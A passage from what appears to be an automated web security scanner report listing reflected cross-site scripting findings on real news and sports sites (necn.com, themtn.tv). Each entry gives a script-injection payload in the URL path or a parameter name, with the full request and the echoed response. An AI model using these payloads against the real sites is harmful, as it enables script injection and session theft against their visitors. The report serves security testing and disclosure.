...[SNIP]...

2.540. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6187b"><script>alert(1)</script>c5c12a29ef2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/106187b"><script>alert(1)</script>c5c12a29ef2/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44826
Content-Type: text/html
Set-Cookie: PHPSESSID=d1b2480b54dd714fec748124a145ea4c; path=/
Expires: Sun, 19 Dec 2010 18:43:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/106187b"><script>alert(1)</script>c5c12a29ef2/Sunday-noon-forecast-Sun-and-clouds/landing.html">
...[SNIP]...

2.541. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da433"><script>alert(1)</script>a79d95431e9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Sunday-noon-forecast-Sun-and-cloudsda433"><script>alert(1)</script>a79d95431e9/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44807
Content-Type: text/html
Set-Cookie: PHPSESSID=993fc4cf2c9fc1823580a8d1634c340b; path=/
Expires: Sun, 19 Dec 2010 18:43:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Sunday-noon-forecast-Sun-and-cloudsda433"><script>alert(1)</script>a79d95431e9/landing.html">
...[SNIP]...

2.542. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76aaa"><script>alert(1)</script>d7c53140d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html?76aaa"><script>alert(1)</script>d7c53140d3d=1 HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44832
Content-Type: text/html
Set-Cookie: PHPSESSID=4b1c491167faac6fb29e9f413216dfa9; path=/
Expires: Sun, 19 Dec 2010 18:43:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="76aaa"><script>alert(1)</script>d7c53140d3d" id = "76aaa">
...[SNIP]...

2.543. http://www.themtn.tv/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2ee0<script>alert(1)</script>a3a193b31c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.htmlc2ee0<script>alert(1)</script>a3a193b31c8 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:43:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:58 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.htmlc2ee0<script>alert(1)</script>a3a193b31c8"</strong>
...[SNIP]...

2.544. http://www.themtn.tv/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5d2c0<script>alert(1)</script>14cd630e01 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html5d2c0<script>alert(1)</script>14cd630e01 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:43:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:56 GMT
Content-Length: 800
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html5d2c0<script>alert(1)</script>14cd630e01"</strong>
...[SNIP]...

2.545. http://www.themtn.tv/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a1ab<script>alert(1)</script>a5e8593ef26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html4a1ab<script>alert(1)</script>a5e8593ef26 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:00 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html4a1ab<script>alert(1)</script>a5e8593ef26"</strong>
...[SNIP]...

2.546. http://www.themtn.tv/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aee88<script>alert(1)</script>66515e37b26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.htmlaee88<script>alert(1)</script>66515e37b26 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:05 GMT
Content-Length: 796
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.htmlaee88<script>alert(1)</script>66515e37b26"</strong>
...[SNIP]...

2.547. http://www.themtn.tv/06/01/10/Around-the-Mountain---Air-Force-Football/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/01/10/Around-the-Mountain---Air-Force-Football/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5a3d<script>alert(1)</script>e27c1e73d8a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/01/10/Around-the-Mountain---Air-Force-Football/landing.htmlb5a3d<script>alert(1)</script>e27c1e73d8a HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:06 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/01/10/Around-the-Mountain---Air-Force-Football/landing.htmlb5a3d<script>alert(1)</script>e27c1e73d8a"</strong>
...[SNIP]...

2.548. http://www.themtn.tv/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8478<script>alert(1)</script>4fcf470c6ed was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.htmlb8478<script>alert(1)</script>4fcf470c6ed HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:05 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.htmlb8478<script>alert(1)</script>4fcf470c6ed"</strong>
...[SNIP]...

2.549. http://www.themtn.tv/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e583<script>alert(1)</script>196f3d11a89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html4e583<script>alert(1)</script>196f3d11a89 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:12 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html4e583<script>alert(1)</script>196f3d11a89"</strong>
...[SNIP]...

2.550. http://www.themtn.tv/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ced3f<script>alert(1)</script>560af78acbc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.htmlced3f<script>alert(1)</script>560af78acbc HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:09 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.htmlced3f<script>alert(1)</script>560af78acbc"</strong>
...[SNIP]...

2.551. http://www.themtn.tv/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 957b5<script>alert(1)</script>c69e7af782e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html957b5<script>alert(1)</script>c69e7af782e HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:20 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html957b5<script>alert(1)</script>c69e7af782e"</strong>
...[SNIP]...

2.552. http://www.themtn.tv/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 38a51<script>alert(1)</script>09a6ef307a1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html38a51<script>alert(1)</script>09a6ef307a1 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:15 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html38a51<script>alert(1)</script>09a6ef307a1"</strong>
...[SNIP]...

2.553. http://www.themtn.tv/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62a40<script>alert(1)</script>578abcaeca8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html62a40<script>alert(1)</script>578abcaeca8 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:19 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html62a40<script>alert(1)</script>578abcaeca8"</strong>
...[SNIP]...

2.554. http://www.themtn.tv/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cdacd<script>alert(1)</script>2e4a0ae94f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.htmlcdacd<script>alert(1)</script>2e4a0ae94f7 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:22 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.htmlcdacd<script>alert(1)</script>2e4a0ae94f7"</strong>
...[SNIP]...

2.555. http://www.themtn.tv/09/08/10/Excellent-Source-for-Breaking-News/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /09/08/10/Excellent-Source-for-Breaking-News/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78e95<script>alert(1)</script>709b1708fa6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /09/08/10/Excellent-Source-for-Breaking-News/landing.html78e95<script>alert(1)</script>709b1708fa6 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:16 GMT
Content-Length: 800
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/09/08/10/Excellent-Source-for-Breaking-News/landing.html78e95<script>alert(1)</script>709b1708fa6"</strong>
...[SNIP]...

2.556. http://www.themtn.tv/09/14/10/Quality-Original-Programming/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /09/14/10/Quality-Original-Programming/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9f87<script>alert(1)</script>956c4f28043 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /09/14/10/Quality-Original-Programming/landing.htmle9f87<script>alert(1)</script>956c4f28043 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:21 GMT
Content-Length: 794
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
